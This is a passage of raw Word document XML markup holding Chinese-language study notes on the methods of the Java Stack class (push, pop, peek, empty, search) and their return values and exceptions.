          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>把项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>压入栈顶。其作用与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> addElement (item ) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>压入栈顶的项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">2. public pop () </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>移除栈顶对象，并作为函数的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回该对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回：栈顶对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象的中的最后一项）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>抛出异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmptyStackException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>如果堆栈式空的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">3. public peek() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>查看栈顶对象而不移除它。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回：栈顶对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象的中的最后一项）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>抛出异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmptyStackException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>如果堆栈式空的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">4. public boolean empty </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（测试堆栈是否为空。）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>当且仅当堆栈中不含任何项时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">5. public int search  (object o)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>返回对象在堆栈中位置，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>为基数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>如果对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ｏ是栈中的一项，该方法返回距离　栈顶最近的出现位置到栈顶的距离；　栈中最上端项的距离为　１　。　使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>堆栈中的项。。。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>目标对象；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B43E4F" w:rsidRPr="00B872EE" w:rsidRDefault="00B43E4F" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="0087699E" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00947408">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
